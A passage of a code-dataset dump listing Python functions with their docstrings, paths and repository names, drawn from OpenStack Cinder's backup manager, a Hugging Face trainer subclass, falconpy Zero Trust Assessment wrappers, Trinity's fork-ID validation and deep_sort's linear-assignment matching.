verified. Skipping verify.') % {'configured_service': self.driver_name, 'id': backup.id}) raise exception.BackupVerifyUnsupportedDriver(reason=msg) elif ((status == fields.BackupStatus.ERROR) or ((status == fields.BackupStatus.AVAILABLE) and (backup.status == fields.BackupStatus.RESTORING))): backup.status = status backup.save() except exception.InvalidBackup: with excutils.save_and_reraise_exception(): LOG.error('Backup id %s is not invalid. Skipping reset.', backup.id) except exception.BackupVerifyUnsupportedDriver: with excutils.save_and_reraise_exception(): LOG.error('Backup service %(configured_service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.', {'configured_service': self.driver_name, 'id': backup.id}) except AttributeError: msg = (_('Backup service %(service)s does not support verify. Backup id %(id)s is not verified. Skipping reset.') % {'service': self.driver_name, 'id': backup.id}) LOG.error(msg) raise exception.BackupVerifyUnsupportedDriver(reason=msg) try: self._cleanup_temp_volumes_snapshots_for_one_backup(context, backup) except Exception: LOG.exception('Problem cleaning temp volumes and snapshots for backup %(bkup)s.', {'bkup': backup.id}) notifier_info = {'id': backup.id, 'update': {'status': status}} notifier = rpc.get_notifier('backupStatusUpdate') notifier.info(context, 'backups.reset_status.end', notifier_info)
def reset_status(self, context, backup, status): 'Reset volume backup status.\n\n :param context: running context\n :param backup: The backup object for reset status operation\n :param status: The status to be set\n :raises InvalidBackup:\n :raises BackupVerifyUnsupportedDriver:\n :raises AttributeError:\n ' LOG.info('Reset backup status started, backup_id: %(backup_id)s, status: %(status)s.', {'backup_id': backup.id, 'status': status}) backup_service_name = self._map_service_to_driver(backup.service) LOG.info('Backup service: %s.', backup_service_name) if (backup_service_name is not None): configured_service = self.driver_name if (backup_service_name not in configured_service): err = (_('Reset backup status aborted, the backup service currently configured [%(configured_service)s] is not the backup service that was used to create this backup [%(backup_service)s].') % {'configured_service': configured_service, 'backup_service': backup_service_name}) raise exception.InvalidBackup(reason=err) try: if ((status == fields.BackupStatus.AVAILABLE) and (backup['status'] != fields.BackupStatus.RESTORING)): backup_service = self.get_backup_driver(context) if isinstance(backup_service, driver.BackupDriverWithVerify): backup_service.verify(backup.id) backup.status = status backup.save() else: msg = (_('Backup service %(configured_service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.') % {'configured_service': self.driver_name, 'id': backup.id}) raise exception.BackupVerifyUnsupportedDriver(reason=msg) elif ((status == fields.BackupStatus.ERROR) or ((status == fields.BackupStatus.AVAILABLE) and (backup.status == fields.BackupStatus.RESTORING))): backup.status = status backup.save() except exception.InvalidBackup: with excutils.save_and_reraise_exception(): LOG.error('Backup id %s is not invalid. Skipping reset.', backup.id) except exception.BackupVerifyUnsupportedDriver: with excutils.save_and_reraise_exception(): LOG.error('Backup service %(configured_service)s does not support verify. Backup id %(id)s is not verified. Skipping verify.', {'configured_service': self.driver_name, 'id': backup.id}) except AttributeError: msg = (_('Backup service %(service)s does not support verify. Backup id %(id)s is not verified. Skipping reset.') % {'service': self.driver_name, 'id': backup.id}) LOG.error(msg) raise exception.BackupVerifyUnsupportedDriver(reason=msg) try: self._cleanup_temp_volumes_snapshots_for_one_backup(context, backup) except Exception: LOG.exception('Problem cleaning temp volumes and snapshots for backup %(bkup)s.', {'bkup': backup.id}) notifier_info = {'id': backup.id, 'update': {'status': status}} notifier = rpc.get_notifier('backupStatusUpdate') notifier.info(context, 'backups.reset_status.end', notifier_info)<|docstring|>Reset volume backup status. :param context: running context :param backup: The backup object for reset status operation :param status: The status to be set :raises InvalidBackup: :raises BackupVerifyUnsupportedDriver: :raises AttributeError:<|endoftext|>
135a2f8489a1f6716eb54d6f519540473629140adc1f502315f2204fd107215a
def check_support_to_force_delete(self, context): 'Check if the backup driver supports force delete operation.\n\n :param context: running context\n ' backup_service = self.get_backup_driver(context) return backup_service.support_force_delete
Check if the backup driver supports force delete operation. :param context: running context
cinder/backup/manager.py
check_support_to_force_delete
inspur-storage/cinder
1
python
def check_support_to_force_delete(self, context): 'Check if the backup driver supports force delete operation.\n\n :param context: running context\n ' backup_service = self.get_backup_driver(context) return backup_service.support_force_delete
def check_support_to_force_delete(self, context): 'Check if the backup driver supports force delete operation.\n\n :param context: running context\n ' backup_service = self.get_backup_driver(context) return backup_service.support_force_delete<|docstring|>Check if the backup driver supports force delete operation. :param context: running context<|endoftext|>
bd2dbc3e9e6ad5bec0859f6e7600512ae18c9339002202c1d25a4084f0616f30
def _attach_device(self, ctxt, backup_device, properties, is_snapshot=False): 'Attach backup device.' if (not is_snapshot): return self._attach_volume(ctxt, backup_device, properties) else: return self._attach_snapshot(ctxt, backup_device, properties)
Attach backup device.
cinder/backup/manager.py
_attach_device
inspur-storage/cinder
1
python
def _attach_device(self, ctxt, backup_device, properties, is_snapshot=False): if (not is_snapshot): return self._attach_volume(ctxt, backup_device, properties) else: return self._attach_snapshot(ctxt, backup_device, properties)
def _attach_device(self, ctxt, backup_device, properties, is_snapshot=False): if (not is_snapshot): return self._attach_volume(ctxt, backup_device, properties) else: return self._attach_snapshot(ctxt, backup_device, properties)<|docstring|>Attach backup device.<|endoftext|>
b6c7b5f66c2467dd0c791e1e74bdec234412479bc8252b65614d5e7aca89ec30
def _attach_volume(self, context, volume, properties): 'Attach a volume.' try: conn = self.volume_rpcapi.initialize_connection(context, volume, properties) return self._connect_device(conn) except Exception: with excutils.save_and_reraise_exception(): try: self.volume_rpcapi.terminate_connection(context, volume, properties, force=True) except Exception: LOG.warning('Failed to terminate the connection of volume %(volume_id)s, but it is acceptable.', {'volume_id', volume.id})
Attach a volume.
cinder/backup/manager.py
_attach_volume
inspur-storage/cinder
1
python
def _attach_volume(self, context, volume, properties): try: conn = self.volume_rpcapi.initialize_connection(context, volume, properties) return self._connect_device(conn) except Exception: with excutils.save_and_reraise_exception(): try: self.volume_rpcapi.terminate_connection(context, volume, properties, force=True) except Exception: LOG.warning('Failed to terminate the connection of volume %(volume_id)s, but it is acceptable.', {'volume_id', volume.id})
def _attach_volume(self, context, volume, properties): try: conn = self.volume_rpcapi.initialize_connection(context, volume, properties) return self._connect_device(conn) except Exception: with excutils.save_and_reraise_exception(): try: self.volume_rpcapi.terminate_connection(context, volume, properties, force=True) except Exception: LOG.warning('Failed to terminate the connection of volume %(volume_id)s, but it is acceptable.', {'volume_id', volume.id})<|docstring|>Attach a volume.<|endoftext|>
78147b47019286c8a9ca328c58acc792052da5ff60a3ab228ec027d5c5ddf426
def _attach_snapshot(self, ctxt, snapshot, properties): 'Attach a snapshot.' try: conn = self.volume_rpcapi.initialize_connection_snapshot(ctxt, snapshot, properties) return self._connect_device(conn) except Exception: with excutils.save_and_reraise_exception(): try: self.volume_rpcapi.terminate_connection_snapshot(ctxt, snapshot, properties, force=True) except Exception: LOG.warning('Failed to terminate the connection of snapshot %(snapshot_id)s, but it is acceptable.', {'snapshot_id', snapshot.id})
Attach a snapshot.
cinder/backup/manager.py
_attach_snapshot
inspur-storage/cinder
1
python
def _attach_snapshot(self, ctxt, snapshot, properties): try: conn = self.volume_rpcapi.initialize_connection_snapshot(ctxt, snapshot, properties) return self._connect_device(conn) except Exception: with excutils.save_and_reraise_exception(): try: self.volume_rpcapi.terminate_connection_snapshot(ctxt, snapshot, properties, force=True) except Exception: LOG.warning('Failed to terminate the connection of snapshot %(snapshot_id)s, but it is acceptable.', {'snapshot_id', snapshot.id})
def _attach_snapshot(self, ctxt, snapshot, properties): try: conn = self.volume_rpcapi.initialize_connection_snapshot(ctxt, snapshot, properties) return self._connect_device(conn) except Exception: with excutils.save_and_reraise_exception(): try: self.volume_rpcapi.terminate_connection_snapshot(ctxt, snapshot, properties, force=True) except Exception: LOG.warning('Failed to terminate the connection of snapshot %(snapshot_id)s, but it is acceptable.', {'snapshot_id', snapshot.id})<|docstring|>Attach a snapshot.<|endoftext|>
1d4cff7c35020e308945ab38a7d4609ec0d8f970f6c4f05ea56f222c5f75f6c9
def _connect_device(self, conn): 'Establish connection to device.' use_multipath = CONF.use_multipath_for_image_xfer device_scan_attempts = CONF.num_volume_device_scan_tries protocol = conn['driver_volume_type'] connector = utils.brick_get_connector(protocol, use_multipath=use_multipath, device_scan_attempts=device_scan_attempts, conn=conn) vol_handle = connector.connect_volume(conn['data']) return {'conn': conn, 'device': vol_handle, 'connector': connector}
Establish connection to device.
cinder/backup/manager.py
_connect_device
inspur-storage/cinder
1
python
def _connect_device(self, conn): use_multipath = CONF.use_multipath_for_image_xfer device_scan_attempts = CONF.num_volume_device_scan_tries protocol = conn['driver_volume_type'] connector = utils.brick_get_connector(protocol, use_multipath=use_multipath, device_scan_attempts=device_scan_attempts, conn=conn) vol_handle = connector.connect_volume(conn['data']) return {'conn': conn, 'device': vol_handle, 'connector': connector}
def _connect_device(self, conn): use_multipath = CONF.use_multipath_for_image_xfer device_scan_attempts = CONF.num_volume_device_scan_tries protocol = conn['driver_volume_type'] connector = utils.brick_get_connector(protocol, use_multipath=use_multipath, device_scan_attempts=device_scan_attempts, conn=conn) vol_handle = connector.connect_volume(conn['data']) return {'conn': conn, 'device': vol_handle, 'connector': connector}<|docstring|>Establish connection to device.<|endoftext|>
113a20b88f005418cca585a3a4a9a590ceb246a8de4484e8c0f8225c8d20525f
def _detach_device(self, ctxt, attach_info, device, properties, is_snapshot=False, force=False, ignore_errors=False): 'Disconnect the volume or snapshot from the host. ' connector = attach_info['connector'] connector.disconnect_volume(attach_info['conn']['data'], attach_info['device'], force=force, ignore_errors=ignore_errors) rpcapi = self.volume_rpcapi if (not is_snapshot): rpcapi.terminate_connection(ctxt, device, properties, force=force) rpcapi.remove_export(ctxt, device) else: rpcapi.terminate_connection_snapshot(ctxt, device, properties, force=force) rpcapi.remove_export_snapshot(ctxt, device)
Disconnect the volume or snapshot from the host.
cinder/backup/manager.py
_detach_device
inspur-storage/cinder
1
python
def _detach_device(self, ctxt, attach_info, device, properties, is_snapshot=False, force=False, ignore_errors=False): ' ' connector = attach_info['connector'] connector.disconnect_volume(attach_info['conn']['data'], attach_info['device'], force=force, ignore_errors=ignore_errors) rpcapi = self.volume_rpcapi if (not is_snapshot): rpcapi.terminate_connection(ctxt, device, properties, force=force) rpcapi.remove_export(ctxt, device) else: rpcapi.terminate_connection_snapshot(ctxt, device, properties, force=force) rpcapi.remove_export_snapshot(ctxt, device)
def _detach_device(self, ctxt, attach_info, device, properties, is_snapshot=False, force=False, ignore_errors=False): ' ' connector = attach_info['connector'] connector.disconnect_volume(attach_info['conn']['data'], attach_info['device'], force=force, ignore_errors=ignore_errors) rpcapi = self.volume_rpcapi if (not is_snapshot): rpcapi.terminate_connection(ctxt, device, properties, force=force) rpcapi.remove_export(ctxt, device) else: rpcapi.terminate_connection_snapshot(ctxt, device, properties, force=force) rpcapi.remove_export_snapshot(ctxt, device)<|docstring|>Disconnect the volume or snapshot from the host.<|endoftext|>
d1419e640a7d913f8e05105ba6633db6969f356b969e4825f98668ade3e26e7d
def compute_loss(self, model, inputs, return_outputs=False): '\n How the loss is computed by Trainer. By default, all models return the loss in the first element.\n\n Subclass and override for custom behavior.\n ' if ((self.label_smoother is not None) and ('labels' in inputs)): labels = inputs.pop('labels') else: labels = None outputs = model(**inputs) if (self.args.past_index >= 0): self._past = outputs[self.args.past_index] if (labels is not None): loss = self.label_smoother(outputs, labels) else: loss = (outputs['loss'] if isinstance(outputs, dict) else outputs[0]) return ((loss, outputs) if return_outputs else loss)
How the loss is computed by Trainer. By default, all models return the loss in the first element. Subclass and override for custom behavior.
src/magic_box/train_qa.py
compute_loss
Oh-Donggyu/mrc-level2-nlp-01
1
python
def compute_loss(self, model, inputs, return_outputs=False): '\n How the loss is computed by Trainer. By default, all models return the loss in the first element.\n\n Subclass and override for custom behavior.\n ' if ((self.label_smoother is not None) and ('labels' in inputs)): labels = inputs.pop('labels') else: labels = None outputs = model(**inputs) if (self.args.past_index >= 0): self._past = outputs[self.args.past_index] if (labels is not None): loss = self.label_smoother(outputs, labels) else: loss = (outputs['loss'] if isinstance(outputs, dict) else outputs[0]) return ((loss, outputs) if return_outputs else loss)
def compute_loss(self, model, inputs, return_outputs=False): '\n How the loss is computed by Trainer. By default, all models return the loss in the first element.\n\n Subclass and override for custom behavior.\n ' if ((self.label_smoother is not None) and ('labels' in inputs)): labels = inputs.pop('labels') else: labels = None outputs = model(**inputs) if (self.args.past_index >= 0): self._past = outputs[self.args.past_index] if (labels is not None): loss = self.label_smoother(outputs, labels) else: loss = (outputs['loss'] if isinstance(outputs, dict) else outputs[0]) return ((loss, outputs) if return_outputs else loss)<|docstring|>How the loss is computed by Trainer. By default, all models return the loss in the first element. Subclass and override for custom behavior.<|endoftext|>
4326d5884548a59f89e1adf05590035975fa02cc228c77abd57cb776d633eb77
def get_eval_dataloader(self, eval_dataset: Optional[Dataset]=None) -> DataLoader: '\n Returns the evaluation :class:`~torch.utils.data.DataLoader`.\n\n Subclass and override this method if you want to inject some custom behavior.\n\n Args:\n eval_dataset (:obj:`torch.utils.data.Dataset`, `optional`):\n If provided, will override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`, columns not\n accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`.\n ' if ((eval_dataset is None) and (self.eval_dataset is None)): raise ValueError('Trainer: evaluation requires an eval_dataset.') eval_dataset = (eval_dataset if (eval_dataset is not None) else self.eval_dataset) if (is_datasets_available() and isinstance(eval_dataset, datasets.Dataset)): eval_dataset = self._remove_unused_columns(eval_dataset, description='evaluation') if isinstance(eval_dataset, torch.utils.data.IterableDataset): if (self.args.world_size > 1): eval_dataset = IterableDatasetShard(eval_dataset, batch_size=self.args.eval_batch_size, drop_last=self.args.dataloader_drop_last, num_processes=self.args.world_size, process_index=self.args.process_index) return DataLoader(eval_dataset, batch_size=self.args.eval_batch_size, collate_fn=default_data_collator, num_workers=self.args.dataloader_num_workers, pin_memory=self.args.dataloader_pin_memory) eval_sampler = self._get_eval_sampler(eval_dataset) return DataLoader(eval_dataset, sampler=eval_sampler, batch_size=self.args.eval_batch_size, collate_fn=default_data_collator, drop_last=self.args.dataloader_drop_last, num_workers=self.args.dataloader_num_workers, pin_memory=self.args.dataloader_pin_memory)
Returns the evaluation :class:`~torch.utils.data.DataLoader`. Subclass and override this method if you want to inject some custom behavior. Args: eval_dataset (:obj:`torch.utils.data.Dataset`, `optional`): If provided, will override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`.
src/magic_box/train_qa.py
get_eval_dataloader
Oh-Donggyu/mrc-level2-nlp-01
1
python
def get_eval_dataloader(self, eval_dataset: Optional[Dataset]=None) -> DataLoader: '\n Returns the evaluation :class:`~torch.utils.data.DataLoader`.\n\n Subclass and override this method if you want to inject some custom behavior.\n\n Args:\n eval_dataset (:obj:`torch.utils.data.Dataset`, `optional`):\n If provided, will override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`, columns not\n accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`.\n ' if ((eval_dataset is None) and (self.eval_dataset is None)): raise ValueError('Trainer: evaluation requires an eval_dataset.') eval_dataset = (eval_dataset if (eval_dataset is not None) else self.eval_dataset) if (is_datasets_available() and isinstance(eval_dataset, datasets.Dataset)): eval_dataset = self._remove_unused_columns(eval_dataset, description='evaluation') if isinstance(eval_dataset, torch.utils.data.IterableDataset): if (self.args.world_size > 1): eval_dataset = IterableDatasetShard(eval_dataset, batch_size=self.args.eval_batch_size, drop_last=self.args.dataloader_drop_last, num_processes=self.args.world_size, process_index=self.args.process_index) return DataLoader(eval_dataset, batch_size=self.args.eval_batch_size, collate_fn=default_data_collator, num_workers=self.args.dataloader_num_workers, pin_memory=self.args.dataloader_pin_memory) eval_sampler = self._get_eval_sampler(eval_dataset) return DataLoader(eval_dataset, sampler=eval_sampler, batch_size=self.args.eval_batch_size, collate_fn=default_data_collator, drop_last=self.args.dataloader_drop_last, num_workers=self.args.dataloader_num_workers, pin_memory=self.args.dataloader_pin_memory)
def get_eval_dataloader(self, eval_dataset: Optional[Dataset]=None) -> DataLoader: '\n Returns the evaluation :class:`~torch.utils.data.DataLoader`.\n\n Subclass and override this method if you want to inject some custom behavior.\n\n Args:\n eval_dataset (:obj:`torch.utils.data.Dataset`, `optional`):\n If provided, will override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`, columns not\n accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`.\n ' if ((eval_dataset is None) and (self.eval_dataset is None)): raise ValueError('Trainer: evaluation requires an eval_dataset.') eval_dataset = (eval_dataset if (eval_dataset is not None) else self.eval_dataset) if (is_datasets_available() and isinstance(eval_dataset, datasets.Dataset)): eval_dataset = self._remove_unused_columns(eval_dataset, description='evaluation') if isinstance(eval_dataset, torch.utils.data.IterableDataset): if (self.args.world_size > 1): eval_dataset = IterableDatasetShard(eval_dataset, batch_size=self.args.eval_batch_size, drop_last=self.args.dataloader_drop_last, num_processes=self.args.world_size, process_index=self.args.process_index) return DataLoader(eval_dataset, batch_size=self.args.eval_batch_size, collate_fn=default_data_collator, num_workers=self.args.dataloader_num_workers, pin_memory=self.args.dataloader_pin_memory) eval_sampler = self._get_eval_sampler(eval_dataset) return DataLoader(eval_dataset, sampler=eval_sampler, batch_size=self.args.eval_batch_size, collate_fn=default_data_collator, drop_last=self.args.dataloader_drop_last, num_workers=self.args.dataloader_num_workers, pin_memory=self.args.dataloader_pin_memory)<|docstring|>Returns the evaluation :class:`~torch.utils.data.DataLoader`. Subclass and override this method if you want to inject some custom behavior. Args: eval_dataset (:obj:`torch.utils.data.Dataset`, `optional`): If provided, will override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`, columns not accepted by the ``model.forward()`` method are automatically removed. It must implement :obj:`__len__`.<|endoftext|>
feeff17ccefc5784c319e3effb7d95b87c75c4a4e264c38142ccee13ccc2acfc
@force_default(defaults=['parameters'], default_types=['dict']) def get_assessment(self: object, parameters: dict=None, **kwargs) -> dict: '\n Get Zero Trust Assessment data for one or more hosts by providing agent IDs (AID) and a customer ID (CID).\n ' return process_service_request(calling_object=self, endpoints=Endpoints, operation_id='getAssessmentV1', keywords=kwargs, params=parameters)
Get Zero Trust Assessment data for one or more hosts by providing agent IDs (AID) and a customer ID (CID).
src/falconpy/zero_trust_assessment.py
get_assessment
woodtechie1428/falconpy
0
python
@force_default(defaults=['parameters'], default_types=['dict']) def get_assessment(self: object, parameters: dict=None, **kwargs) -> dict: '\n \n ' return process_service_request(calling_object=self, endpoints=Endpoints, operation_id='getAssessmentV1', keywords=kwargs, params=parameters)
@force_default(defaults=['parameters'], default_types=['dict']) def get_assessment(self: object, parameters: dict=None, **kwargs) -> dict: '\n \n ' return process_service_request(calling_object=self, endpoints=Endpoints, operation_id='getAssessmentV1', keywords=kwargs, params=parameters)<|docstring|>Get Zero Trust Assessment data for one or more hosts by providing agent IDs (AID) and a customer ID (CID).<|endoftext|>
67fb4bda8f63a5b56e9f083a06bd2e8c0ba671d97a4cbb19e98a73f61b32d8a3
def get_compliance(self: object) -> dict: '\n Get the Zero Trust Assessment compliance report for one customer ID (CID).\n ' return process_service_request(calling_object=self, endpoints=Endpoints, operation_id='getComplianceV1')
Get the Zero Trust Assessment compliance report for one customer ID (CID).
src/falconpy/zero_trust_assessment.py
get_compliance
woodtechie1428/falconpy
0
python
def get_compliance(self: object) -> dict: '\n \n ' return process_service_request(calling_object=self, endpoints=Endpoints, operation_id='getComplianceV1')
def get_compliance(self: object) -> dict: '\n \n ' return process_service_request(calling_object=self, endpoints=Endpoints, operation_id='getComplianceV1')<|docstring|>Get the Zero Trust Assessment compliance report for one customer ID (CID).<|endoftext|>
6d1b09f526f079a1ae906be23cbe92e0e4d6044c2683f580e079a3b16c28f288
def validate_forkid(forkid: ForkID, genesis_hash: Hash32, head: BlockNumber, fork_blocks: Tuple[(BlockNumber, ...)]) -> None: '\n Validate the given ForkID against our current state.\n\n Validation rules are described at\n https://github.com/ethereum/EIPs/blob/master/EIPS/eip-2124.md#validation-rules\n ' fork_blocks_list = list(fork_blocks) checksums = [binascii.crc32(genesis_hash)] for block_number in fork_blocks_list: block_number_as_bytes = block_number.to_bytes(8, 'big') checksums.append(binascii.crc32(block_number_as_bytes, checksums[(- 1)])) fork_blocks_list.append(BlockNumber(sys.maxsize)) for (i, block_number) in enumerate(fork_blocks_list): if (head > block_number): continue if (_crc_to_bytes(checksums[i]) == forkid.hash): if ((forkid.next > 0) and (head >= forkid.next)): raise LocalChainIncompatibleOrStale('rule 1a') return for (b, checksum) in itertools.zip_longest(fork_blocks_list[:i], checksums[:i]): if (_crc_to_bytes(checksum) == forkid.hash): if (b != forkid.next): raise RemoteChainIsStale() return for checksum in checksums[i:]: if (_crc_to_bytes(checksum) == forkid.hash): return raise LocalChainIncompatibleOrStale('different chains') logging.getLogger('p2p').error('Impossible forkid validation for %s', forkid)
Validate the given ForkID against our current state. Validation rules are described at https://github.com/ethereum/EIPs/blob/master/EIPS/eip-2124.md#validation-rules
trinity/protocol/eth/forkid.py
validate_forkid
indi-ca/trinity
1
python
def validate_forkid(forkid: ForkID, genesis_hash: Hash32, head: BlockNumber, fork_blocks: Tuple[(BlockNumber, ...)]) -> None: '\n Validate the given ForkID against our current state.\n\n Validation rules are described at\n https://github.com/ethereum/EIPs/blob/master/EIPS/eip-2124.md#validation-rules\n ' fork_blocks_list = list(fork_blocks) checksums = [binascii.crc32(genesis_hash)] for block_number in fork_blocks_list: block_number_as_bytes = block_number.to_bytes(8, 'big') checksums.append(binascii.crc32(block_number_as_bytes, checksums[(- 1)])) fork_blocks_list.append(BlockNumber(sys.maxsize)) for (i, block_number) in enumerate(fork_blocks_list): if (head > block_number): continue if (_crc_to_bytes(checksums[i]) == forkid.hash): if ((forkid.next > 0) and (head >= forkid.next)): raise LocalChainIncompatibleOrStale('rule 1a') return for (b, checksum) in itertools.zip_longest(fork_blocks_list[:i], checksums[:i]): if (_crc_to_bytes(checksum) == forkid.hash): if (b != forkid.next): raise RemoteChainIsStale() return for checksum in checksums[i:]: if (_crc_to_bytes(checksum) == forkid.hash): return raise LocalChainIncompatibleOrStale('different chains') logging.getLogger('p2p').error('Impossible forkid validation for %s', forkid)
def validate_forkid(forkid: ForkID, genesis_hash: Hash32, head: BlockNumber, fork_blocks: Tuple[(BlockNumber, ...)]) -> None: '\n Validate the given ForkID against our current state.\n\n Validation rules are described at\n https://github.com/ethereum/EIPs/blob/master/EIPS/eip-2124.md#validation-rules\n ' fork_blocks_list = list(fork_blocks) checksums = [binascii.crc32(genesis_hash)] for block_number in fork_blocks_list: block_number_as_bytes = block_number.to_bytes(8, 'big') checksums.append(binascii.crc32(block_number_as_bytes, checksums[(- 1)])) fork_blocks_list.append(BlockNumber(sys.maxsize)) for (i, block_number) in enumerate(fork_blocks_list): if (head > block_number): continue if (_crc_to_bytes(checksums[i]) == forkid.hash): if ((forkid.next > 0) and (head >= forkid.next)): raise LocalChainIncompatibleOrStale('rule 1a') return for (b, checksum) in itertools.zip_longest(fork_blocks_list[:i], checksums[:i]): if (_crc_to_bytes(checksum) == forkid.hash): if (b != forkid.next): raise RemoteChainIsStale() return for checksum in checksums[i:]: if (_crc_to_bytes(checksum) == forkid.hash): return raise LocalChainIncompatibleOrStale('different chains') logging.getLogger('p2p').error('Impossible forkid validation for %s', forkid)<|docstring|>Validate the given ForkID against our current state. Validation rules are described at https://github.com/ethereum/EIPs/blob/master/EIPS/eip-2124.md#validation-rules<|endoftext|>
ea409c269e0588c52dda98d18afe126f0b26a1bf403f9ce119a34da8f97bafac
def min_cost_matching(distance_metric, max_distance, tracks, detections, track_indices=None, detection_indices=None): 'Solve linear assignment problem.\n\n Parameters\n ----------\n distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray\n The distance metric is given a list of tracks and detections as well as\n a list of N track indices and M detection indices. The metric should\n return the NxM dimensional cost matrix, where element (i, j) is the\n association cost between the i-th track in the given track indices and\n the j-th detection in the given detection_indices.\n max_distance : float\n Gating threshold. Associations with cost larger than this value are\n disregarded.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : List[int]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above).\n detection_indices : List[int]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above).\n\n Returns\n -------\n (List[(int, int)], List[int], List[int])\n Returns a tuple with the following three entries:\n * A list of matched track and detection indices.\n * A list of unmatched track indices.\n * A list of unmatched detection indices.\n\n ' if (track_indices is None): track_indices = np.arange(len(tracks)) if (detection_indices is None): detection_indices = np.arange(len(detections)) if ((len(detection_indices) == 0) or (len(track_indices) == 0)): return ([], track_indices, detection_indices) cost_matrix = distance_metric(tracks, detections, track_indices, detection_indices) cost_matrix[(cost_matrix > max_distance)] = (max_distance + 1e-05) (row_indices, col_indices) = linear_assignment(cost_matrix) (matches, unmatched_tracks, unmatched_detections) = ([], [], []) for (col, detection_idx) in enumerate(detection_indices): if (col not in col_indices): unmatched_detections.append(detection_idx) for (row, track_idx) in enumerate(track_indices): if (row not in row_indices): unmatched_tracks.append(track_idx) for (row, col) in zip(row_indices, col_indices): track_idx = track_indices[row] detection_idx = detection_indices[col] if (cost_matrix[(row, col)] > max_distance): unmatched_tracks.append(track_idx) unmatched_detections.append(detection_idx) else: matches.append((track_idx, detection_idx)) return (matches, unmatched_tracks, unmatched_detections)
Solve linear assignment problem. Parameters ---------- distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray The distance metric is given a list of tracks and detections as well as a list of N track indices and M detection indices. The metric should return the NxM dimensional cost matrix, where element (i, j) is the association cost between the i-th track in the given track indices and the j-th detection in the given detection_indices. max_distance : float Gating threshold. Associations with cost larger than this value are disregarded. tracks : List[track.Track] A list of predicted tracks at the current time step. detections : List[detection.Detection] A list of detections at the current time step. track_indices : List[int] List of track indices that maps rows in `cost_matrix` to tracks in `tracks` (see description above). detection_indices : List[int] List of detection indices that maps columns in `cost_matrix` to detections in `detections` (see description above). Returns ------- (List[(int, int)], List[int], List[int]) Returns a tuple with the following three entries: * A list of matched track and detection indices. * A list of unmatched track indices. * A list of unmatched detection indices.
deep_sort_pytorch/deep_sort/sort/linear_assignment.py
min_cost_matching
JisuHann/Autonomous-Driving-Cart-MEME
2,175
python
def min_cost_matching(distance_metric, max_distance, tracks, detections, track_indices=None, detection_indices=None): 'Solve linear assignment problem.\n\n Parameters\n ----------\n distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray\n The distance metric is given a list of tracks and detections as well as\n a list of N track indices and M detection indices. The metric should\n return the NxM dimensional cost matrix, where element (i, j) is the\n association cost between the i-th track in the given track indices and\n the j-th detection in the given detection_indices.\n max_distance : float\n Gating threshold. Associations with cost larger than this value are\n disregarded.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : List[int]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above).\n detection_indices : List[int]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above).\n\n Returns\n -------\n (List[(int, int)], List[int], List[int])\n Returns a tuple with the following three entries:\n * A list of matched track and detection indices.\n * A list of unmatched track indices.\n * A list of unmatched detection indices.\n\n ' if (track_indices is None): track_indices = np.arange(len(tracks)) if (detection_indices is None): detection_indices = np.arange(len(detections)) if ((len(detection_indices) == 0) or (len(track_indices) == 0)): return ([], track_indices, detection_indices) cost_matrix = distance_metric(tracks, detections, track_indices, detection_indices) cost_matrix[(cost_matrix > max_distance)] = (max_distance + 1e-05) (row_indices, col_indices) = linear_assignment(cost_matrix) (matches, unmatched_tracks, unmatched_detections) = ([], [], []) for (col, detection_idx) in enumerate(detection_indices): if (col not in col_indices): unmatched_detections.append(detection_idx) for (row, track_idx) in enumerate(track_indices): if (row not in row_indices): unmatched_tracks.append(track_idx) for (row, col) in zip(row_indices, col_indices): track_idx = track_indices[row] detection_idx = detection_indices[col] if (cost_matrix[(row, col)] > max_distance): unmatched_tracks.append(track_idx) unmatched_detections.append(detection_idx) else: matches.append((track_idx, detection_idx)) return (matches, unmatched_tracks, unmatched_detections)
def min_cost_matching(distance_metric, max_distance, tracks, detections, track_indices=None, detection_indices=None): 'Solve linear assignment problem.\n\n Parameters\n ----------\n distance_metric : Callable[List[Track], List[Detection], List[int], List[int]) -> ndarray\n The distance metric is given a list of tracks and detections as well as\n a list of N track indices and M detection indices. The metric should\n return the NxM dimensional cost matrix, where element (i, j) is the\n association cost between the i-th track in the given track indices and\n the j-th detection in the given detection_indices.\n max_distance : float\n Gating threshold. Associations with cost larger than this value are\n disregarded.\n tracks : List[track.Track]\n A list of predicted tracks at the current time step.\n detections : List[detection.Detection]\n A list of detections at the current time step.\n track_indices : List[int]\n List of track indices that maps rows in `cost_matrix` to tracks in\n `tracks` (see description above).\n detection_indices : List[int]\n List of detection indices that maps columns in `cost_matrix` to\n detections in `detections` (see description above).\n\n Returns\n -------\n (List[(int, int)], List[int], List[int])\n Returns a tuple with the following three entries:\n * A list of matched track and detection indices.\n * A list of unmatched track indices.\n * A list of unmatched detection indices.\n\n ' if (track_indices is None): track_indices = np.arange(len(tracks)) if (detection_indices is None): detection_indices = np.arange(len(detections)) if ((len(detection_indices) == 0) or (len(track_indices) == 0)): return ([], track_indices, detection_indices) cost_matrix = distance_metric(tracks, detections, track_indices, detection_indices) cost_matrix[(cost_matrix > max_distance)] = (max_distance + 1e-05) (row_indices, col_indices) = linear_assignment(cost_matrix) (matches, unmatched_tracks, unmatched_detections) = ([], [], []) for (col, detection_idx) in enumerate(detection_indices): if (col not in col_indices): unmatched_detections.append(detection_idx) for (row, track_idx) in enumerate(track_indices): if (row not in 